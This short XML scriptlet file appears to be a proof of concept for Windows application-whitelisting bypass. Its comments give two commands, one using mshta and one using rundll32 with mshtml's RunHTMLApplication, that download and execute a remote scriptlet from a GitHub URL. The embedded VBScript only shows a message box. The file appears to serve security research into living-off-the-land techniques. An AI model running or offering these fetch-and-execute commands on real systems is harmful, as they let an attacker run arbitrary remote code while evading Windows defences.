<?xml version="1.0"?>
<!-- Run the following code: -->
<!-- mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/test/master/vbs") -->
<!-- or -->
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/test/master/vbs") -->
<package>
<component id="testVBS">

<script language="VBScript">
<![CDATA[
MsgBox "a"
]]>
</script>

</component>
</package>
